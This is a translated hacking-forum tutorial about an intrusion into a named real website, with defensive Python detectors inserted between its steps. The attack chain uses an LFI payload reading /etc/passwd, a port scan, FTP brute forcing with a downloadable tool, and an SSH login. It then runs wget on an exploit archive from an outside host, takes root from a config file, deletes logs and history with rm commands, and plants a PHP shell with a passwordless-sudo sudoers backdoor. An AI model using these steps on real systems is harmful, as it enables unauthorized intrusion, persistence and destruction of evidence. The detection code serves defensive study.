This is the old rooting tutorial; the new one will follow (sorry, the LFI has already been patched).
The story started when I went to h4cky0u and saw tomstanford's post about an LFI in a Thai website (http://www.h4cky0u.org/forums/viewtopic.php?f=9&t=2014).
The LFI URL:
http://www.zidogang.com/song.php?id=../../../../etc/passwd%00 (sorry, the server is down at the moment)
This LFI returned the contents of the server's /etc/passwd file.
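From the defender's side, a request like the one above leaves a distinctive signature in the web server's access log. As an added example (not from the original post), this Python check parses Apache-style log lines, decodes the query string (including double encoding) and flags traversal, the %00 terminator and references to system files; the log lines are constructed samples, and the second one mirrors the URL from the post.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed Apache combined-log samples (not real traffic); line 2 mirrors the post's URL.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Mar/2009:02:10:01 +0000] "GET /song.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Mar/2009:02:11:44 +0000] "GET /song.php?id=../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "curl/7.19"
203.0.113.9 - - [05/Mar/2009:02:12:03 +0000] "GET /song.php?id=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 2048 "-" "curl/7.19"
203.0.113.7 - - [05/Mar/2009:02:13:20 +0000] "GET /song.php?id=%252e%252e/etc/passwd HTTP/1.1" 404 300 "-" "curl/7.19"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded traversal (%252e%252e) is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def lfi_indicators(target: str) -> list[str]:
    """Name the LFI-style indicators present in one request target (path + query)."""
    query = urlsplit(target).query
    hits = []
    for key, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw)            # parse_qsl decoded once already; %00 is now a NUL
        if "\x00" in value:
            hits.append(f"{key}: null byte (truncates an appended suffix such as .php)")
        if "../" in value.replace("\\", "/"):
            hits.append(f"{key}: directory traversal")
        if "/etc/" in value:
            hits.append(f"{key}: system file reference")
    return hits

def scan_log(text: str) -> list[dict]:
    """Return one finding per suspicious request; a 200 response makes a real read more likely."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = lfi_indicators(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                             "likely_success": m["status"] == "200", "indicators": hits})
    return findings
```

A 200 response to a traversal request, as in the second sample line, is the one to treat as a probable successful read; on the application side the fix is to never build an include path from user input, for instance by mapping the id to a fixed allowlist of files.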
NEXT: After that we do a port scan to check which running services the users in the passwd file could log in to.
From the scan results the running services are visible:
root@mr_my_box# nmap -PN -O zidogang.com
___________________________________
Starting Nmap 4.60 ( http://nmap.org ) at 2009-03-05 02:23 GMT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 28.32% done; ETC: 02:23 (0:00:23 remaining)
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 42.11% done; ETC: 02:23 (0:00:21 remaining)
Stats: 0:01:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 02:24 (0:00:00 remaining)
Interesting ports on 203.146.249.246:
Not shown: 1685 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp filtered rpcbind
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap
170/tcp filtered print-srv
443/tcp open https
445/tcp filtered microsoft-ds
469/tcp filtered rcp
515/tcp filtered printer
593/tcp filtered http-rpc-epmap
707/tcp filtered unknown
1433/tcp filtered ms-sql-s
1434/tcp filtered ms-sql-m
1900/tcp filtered UPnP
2049/tcp filtered nfs
3128/tcp filtered squid-http
3306/tcp open mysql
4444/tcp filtered krb524
4899/tcp filtered radmin
8000/tcp open http-alt
10000/tcp open snet-sensor-mgmt
Aggressive OS guesses: Infoblox NIOS 4.1r5 (94%), Linux 2.6.17 - 2.6.21 (94%), Linux 2.6.17 - 2.6.18 (93%), Linux 2.6.23 (93%), Linux 2.6.5 - 2.6.9 (93%), Linux 2.6.9 - 2.6.11 (93%), Linux 2.6.9 - 2.6.20 (Fedora Core 5 or 6) (93%), Tandberg Border Controller VoIP gateway (Linux 2.6.11) (93%), Linux 2.6.22 - 2.6.23 (93%), Linux 2.6.20-1 (Fedora Core 5) (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime: 13.646 days (since Thu Feb 19 10:54:57 2009)
Network Distance: 10 hops
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.213 seconds
_______________________________________________
Ports 21 and 22 are open:
21/tcp open ftp
22/tcp open ssh
Specifically for this one, I tested with one of my newly built tools.
The tool is one module of the Jasakom web hacking framework;
the module I used is ftp brutus (jasakom ftp brutus version 1.0).
Anyone who wants to try it can download it from
http://mangga-dua.com/images/kurniawan/ftp_brutus.zip
OK, from the scan it looks like FTP and SSH can be logged into. Since the SSH login and password are usually the same as the FTP login and password,
the accounts to brute force are the users that have a shell account,
one of them being:
toey:514:514::/home/toey:/bin/bash
which uses the bash shell, with home directory /home/toey and group 514.
NEXT: so we try brute forcing the FTP side using jasakom ftp brutus:
and the result:
We got the FTP password, which means SSH can be logged into too ...
(to be honest, this ftp brutus only works on weak passwords hehehe)
OK, after testing:
ssh toey@zidogang.com
and we got in!!!
N.B.: I've already changed toey's password, so don't bother trying it, OK? xixixix
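Credential reuse between FTP and SSH, as described above, shows up in the auth log as a burst of failures followed by a password-based SSH login from the same address for the same user. As an added example (not from the original post), this Python detector runs over constructed syslog-style lines (vsftpd failures via pam_unix, plus sshd) and raises an alert when an SSH password login follows at least `threshold` failures for the same source IP and user.

```python
import re
from collections import Counter

# Constructed syslog-style lines (not from the original post): three FTP failures and one SSH
# failure from a single address for "toey", then an SSH password login from that same address.
SAMPLE_AUTH_LOG = """\
Mar  5 02:30:01 box vsftpd[2201]: pam_unix(vsftpd:auth): authentication failure; logname= uid=0 euid=0 tty=ftp ruser=toey rhost=198.51.100.23  user=toey
Mar  5 02:30:02 box vsftpd[2202]: pam_unix(vsftpd:auth): authentication failure; logname= uid=0 euid=0 tty=ftp ruser=toey rhost=198.51.100.23  user=toey
Mar  5 02:30:03 box vsftpd[2203]: pam_unix(vsftpd:auth): authentication failure; logname= uid=0 euid=0 tty=ftp ruser=toey rhost=198.51.100.23  user=toey
Mar  5 02:30:04 box sshd[2204]: Failed password for toey from 198.51.100.23 port 50990 ssh2
Mar  5 02:31:10 box sshd[2310]: Accepted password for toey from 198.51.100.23 port 51022 ssh2
Mar  5 02:40:00 box sshd[2400]: Accepted publickey for admin from 192.0.2.10 port 40000 ssh2
Mar  5 02:41:00 box sshd[2401]: Accepted password for pvo from 192.0.2.11 port 40100 ssh2
"""

PAM_FAIL_RE = re.compile(r'(?P<svc>\w+)\[\d+\]: pam_unix\(\w+:auth\): authentication failure;.*rhost=(?P<ip>\S+).*\buser=(?P<user>\S+)')
SSH_FAIL_RE = re.compile(r'sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)')
SSH_OK_RE = re.compile(r'sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+)')

def failures_by_source(text: str) -> Counter:
    """Count failed logins per (source IP, username) across FTP (PAM) and SSH."""
    counts = Counter()
    for line in text.splitlines():
        m = PAM_FAIL_RE.search(line) or SSH_FAIL_RE.search(line)
        if m:
            counts[(m["ip"], m["user"])] += 1
    return counts

def credential_reuse_alerts(text: str, threshold: int = 3) -> list[dict]:
    """Alert on SSH password logins that follow >= threshold failures for the same IP and user.

    Lines are processed in order, so only failures *before* the successful login count."""
    fails = Counter()
    alerts = []
    for line in text.splitlines():
        m = PAM_FAIL_RE.search(line) or SSH_FAIL_RE.search(line)
        if m:
            fails[(m["ip"], m["user"])] += 1
            continue
        ok = SSH_OK_RE.search(line)
        if ok and ok["method"] == "password" and fails[(ok["ip"], ok["user"])] >= threshold:
            alerts.append({"ip": ok["ip"], "user": ok["user"],
                           "prior_failures": fails[(ok["ip"], ok["user"])], "line": line})
    return alerts
```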
Once in, check the kernel version straight away:
uname -a
Turns out it's kernel 2.6.25.
I immediately downloaded my kernel exploit collection:
$ wget http://mangga-dua.com/images/kurniawan/exploit.tar.gz
$ tar -zxvf exploit.tar.gz
but unfortunately none matched this kernel version,
and I also searched milw0rm and packetstormsecurity and found no exploit for 2.6.25.
NEXT: FEELING SO GOOD IN ESCALATING PRIVILEGE
Just because I couldn't find a kernel exploit doesn't mean the box can't be rooted.
Don't be too dependent on tools / exploits heheheh.
Sometimes, you know, the root password is just there. I guess you know what I mean.
From the first time I got into this server with the toey login I had a feeling the root password was somewhere on this machine.
And it turned out to be true!!!
The root password was in
/home/zidogang/public_html/flux/config.php
After I tried:
$ su
password:
#
Yes, that really was the root password.
OK, after watching for a few days, root and the other users never logged in.
So after a few days I changed the root password.
NEXT: COVERING TRACKS (WARNING!!! THE BEST WAY IS TO EDIT ALL THE LOGS, NOT DELETE THEM!!! BUT SINCE I'M LAZY I JUST DELETED THEM)
Right after that, wipe the traces:
#cd /var/log; rm -f *
#cd /;rm -f .bash_history
#ln -s /dev/null .bash_history
and no using finger, OK?
#cd /usr/bin;rm -f finger
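The track-covering steps above leave artefacts that are easy to check for. As an added example (not part of the original post), this Python check looks for them under a filesystem root: an empty /var/log, a .bash_history that is a symlink (to /dev/null), and an expected binary that has gone missing. The sample tree is constructed in a temporary directory; `HISTORY_FILES` and `EXPECTED_BINARIES` are assumed lists to adapt to the host.

```python
import os
import tempfile

# Assumed locations: root's history in /root, and the one the post creates directly under "/".
HISTORY_FILES = ("root/.bash_history", ".bash_history")
# Assumed list of binaries that should exist on this host; extend to suit the build.
EXPECTED_BINARIES = ("usr/bin/finger",)

def anti_forensics_indicators(root: str = "/") -> list[str]:
    """Report the log wiping, history hiding and tool removal from the steps above, under `root`."""
    hits = []
    log_dir = os.path.join(root, "var", "log")
    if os.path.isdir(log_dir) and not os.listdir(log_dir):
        hits.append("var/log is empty (logs wiped)")
    histories = [os.path.join(root, h) for h in HISTORY_FILES]
    home = os.path.join(root, "home")
    if os.path.isdir(home):
        histories += [os.path.join(home, u, ".bash_history") for u in os.listdir(home)]
    for hist in histories:
        # A genuine history file is never a symlink; one pointing at /dev/null records nothing.
        if os.path.islink(hist):
            hits.append(f"{os.path.relpath(hist, root)} -> {os.readlink(hist)} (history disabled)")
    for rel in EXPECTED_BINARIES:
        if not os.path.exists(os.path.join(root, rel)):
            hits.append(f"{rel} missing")
    return hits

def build_sample_tree() -> str:
    """Construct a tiny fake filesystem showing all three indicators (test data, not a real host)."""
    root = tempfile.mkdtemp(prefix="audit_")
    for d in ("var/log", "root", "usr/bin", "home/toey"):
        os.makedirs(os.path.join(root, d))
    os.symlink("/dev/null", os.path.join(root, "root", ".bash_history"))
    with open(os.path.join(root, "home", "toey", ".bash_history"), "w") as fh:
        fh.write("uname -a\n")  # an ordinary history file must not be flagged
    return root

def demo() -> list[str]:
    """Run the check against the constructed tree; returns the three findings."""
    return anti_forensics_indicators(build_sample_tree())
```

An emptied /var/log refills as soon as daemons write again, so the empty-directory test is a point-in-time signal; on a live host, logs shipped to a remote collector are what survive this kind of cleanup.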
NEXT: PLANTING BACKDOORS
Now, so that our existence as root lasts:
1. plant a PHP shell
2. check the username used to run the PHP shell with:
whoami
e.g.: www-data
3. after logging in as root, go straight to /etc
4. run visudo to edit the sudoers file
#visudo -f sudoers
5. then add this line for the sudo privilege:
www-data ALL=(ALL) NOPASSWD: ALL
(www-data is the user that runs the PHP shell / CGI; this username can vary per server, e.g. apache, userweb, httpd and so on)
That way, even if the root password / root access is no longer in our hands, as long as the box isn't reformatted and the sudoers file isn't changed, we still have root privileges!!! :-D
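A sudoers audit for the kind of entry added in step 5, as an added example that is not from the original post: it parses a constructed sudoers excerpt and flags service accounts (the web-server user names the text lists) that hold any sudo rights, plus any non-root passwordless `ALL` grant. `WEB_SERVICE_ACCOUNTS` is an assumed list to adjust per host.

```python
import re

# Constructed sudoers excerpt: the line from step 5 above alongside ordinary entries.
SAMPLE_SUDOERS = """\
Defaults    requiretty
root        ALL=(ALL)       ALL
%wheel      ALL=(ALL)       ALL
www-data    ALL=(ALL) NOPASSWD: ALL
backup      ALL=(root) NOPASSWD: /usr/bin/rsync
# apache    ALL=(ALL) ALL        (commented out, must be ignored)
"""

# Assumed list of accounts that run web content on this host (names the text mentions).
WEB_SERVICE_ACCOUNTS = {"www-data", "apache", "httpd", "userweb", "nobody"}

# user_or_%group   hosts = (runas) [TAG:]... commands
RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$')

def parse_sudoers(text: str) -> list[dict]:
    """Parse user-specification lines; comments, blanks and Defaults lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = re.findall(r'\b([A-Z]+):', m["cmds"])                      # NOPASSWD:, SETENV:, ...
        cmds = [c.strip() for c in re.sub(r'\b[A-Z]+:', '', m["cmds"]).split(",")]
        rules.append({"who": m["who"], "hosts": m["hosts"], "runas": m["runas"] or "root",
                      "tags": tags, "commands": cmds})
    return rules

def risky_grants(rules: list[dict]) -> list[str]:
    """Return findings for grants that amount to a persistent root backdoor."""
    findings = []
    for r in rules:
        nopasswd = "NOPASSWD" in r["tags"]
        unrestricted = "ALL" in r["commands"]
        who = r["who"].lstrip("%")
        if who in WEB_SERVICE_ACCOUNTS:   # a web user should never have sudo at all
            findings.append(f"{r['who']}: web service account has sudo "
                            f"({'NOPASSWD ' if nopasswd else ''}{', '.join(r['commands'])})")
        elif nopasswd and unrestricted and who != "root":
            findings.append(f"{r['who']}: passwordless unrestricted sudo")
    return findings

def audit(text: str = SAMPLE_SUDOERS) -> list[str]:
    return risky_grants(parse_sudoers(text))
```

Run the same parser over every file in /etc/sudoers.d as well, since an entry dropped there has the same effect as one added with visudo.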
OK, that's all, and thanks to those willing to strain their eyes reading a lousy article like this.
Special thanks to:
ediman lukito, st norman kristanto, Synomadeus, Denny zip and all mikrodata readers and all jasakomers
Written by mywisdom the hidden man and ddoser man